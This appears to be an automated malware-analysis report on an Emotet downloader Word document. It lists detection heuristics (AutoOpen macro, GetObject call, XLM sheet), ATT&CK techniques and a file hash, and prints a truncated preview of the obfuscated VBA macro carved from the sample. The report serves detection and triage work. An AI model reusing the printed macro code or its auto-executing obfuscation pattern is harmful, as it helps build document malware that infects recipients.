MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file triggers multiple high-severity heuristics indicating the presence of auto-executing VBA macros, specifically an AutoOpen macro that calls GetObject. ClamAV detection confirms this as Emotet, a known downloader family. The VBA macro code, though obfuscated, is characteristic of Emotet's behavior of downloading and executing further stages.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-6863641-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6863641-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73106 bytes |
SHA-256: b0c12544a74db81f0e15cb102781e92f754ec4314089984ea47a9d4e4ec1b37c
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "H925_3"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "r_5_823"
Function G62318_()
H739_1 = 586228654 - 691008346
m97061_ = 5556033 + v_322309
Select Case l16_8_00
Case 305309342
z3433_2_ = Chr(108324084 * Tan(h835417_))
T___4937 = k4__0_
Case 965681069
c03__6_ = h9386_
X7_2_7_ = T94051
Case 577281855
O3_166__ = 851095863
H_3547 = U93748_4
End Select
t57__23 = 795929006 - 486297114
k_87_88 = 826922301 + i2_0_3_7
Select Case j571869_
Case 433321813
n35_534 = Chr(697433497 * Tan(T18530))
z450__ = Y_8__6_
Case 465598567
Z_8_0_9_ = w_5_70
F1785_05 = M_3174
Case 169324314
z892_73 = 596115131
o82_25_ = d_569585
End Select
f5685_ = 65687464 - 504488692
s1782352 = 550022110 + u044357_
Select Case s48_4_
Case 804615325
o591262_ = Chr(576469936 * Tan(R_96093))
X9_2_1 = n_786_87
Case 293284431
v28_0_ = f22988
J97229 = j9___2
Case 891925647
D5__0163 = 887162536
h5___95_ = B51832_
End Select
z65602 = 933219181 - 705418112
h2_332_ = 32656349 + E59974_1
Select Case H412771
Case 219298922
H__0_79 = Chr(430128947 * Tan(v64__0_))
V3___661 = m19_6956
Case 911594000
j7_78_14 = j65_44__
X_08559 = f5____
Case 724370197
Y05_8_ = 69384278
B26769 = p_43323
End Select
i88_292 = 423493778 - 232421187
A58351 = 612980487 + O_41871
Select Case B19590_
Case 775763640
z370___2 = Chr(421861865 * Tan(K_6_20))
X08__31 = n_791_34
Case 841671513
P05986 = N77_75
W397_4 = d393349
Case 281209163
I_5_766_ = 245585800
u_479_ = p617_1
End Select
s4794_ = 842366341 - 103087749
X_067_ = 305934119 + t3639_
Select Case j4_0282
Case 110219340
c0_4_9_2 = Chr(624506230 * Tan(r3480_))
C___63_ = T68462_
Case 837928534
W_37213 = Y36920
k_82_38_ = z7180659
Case 613817118
l_35__5 = 6898248
d551__8 = i__3362
End Select
R2__176 = 599453693 - 531820392
s_8_503 = 983399776 + G2_21_
Select Case A2__011
Case 500248428
P69_45 = Chr(613100183 * Tan(t185_9))
z__10_ = f9227__
Case 46938077
U04_07_9 = a__26_1
G9785007 = u474439
Case 966825132
Q41391 = 846220568
k9_34_ = E_3_181_
End Select
j76621_ = 156445723 - 647533155
b36__7__ = 887275053 + F2_9_0
Select Case M8483839
Case 408017018
v12__3 = Chr(997665208 * Tan(Q_672955))
N2__264 = K9_8__
Case 489653810
M_6_7976 = W83_____
z788_1 = O709862
Case 758178888
j350374 = 719511548
w91_6___ = C681303_
End Select
End Function
Function G0___9(A15706, H_55__55)
On Error Resume Next
r17_20__ = 451069782 - 959195055
l912_0_ = 779060155 + m5996240
Select Case p6022__6
Case 225361722
N7_86_36 = Chr(981665465 * Tan(Z242375_))
B__5____ = c6_7_01
Case 987656045
N_9__8 = k7266449
U_374_ = R_5875
Case 518299770
D3_6621 = 240098355
H_8438 = U__0_6_
End Select
i3433__ = 571309018 - 287955622
R___88 = 537878067 + V452_200
Select Case U8___8
Case 333981010
t2_74231 = Chr(864845650 * Tan(h_9_46))
N1335_ = c__340_
Case 979034486
n2__2_9 = h_1_703
k_086993 = p__91_0_
Case 205024266
R9154982 = 380215571
G14__4 = G__070
End Select
n87__5
... (truncated)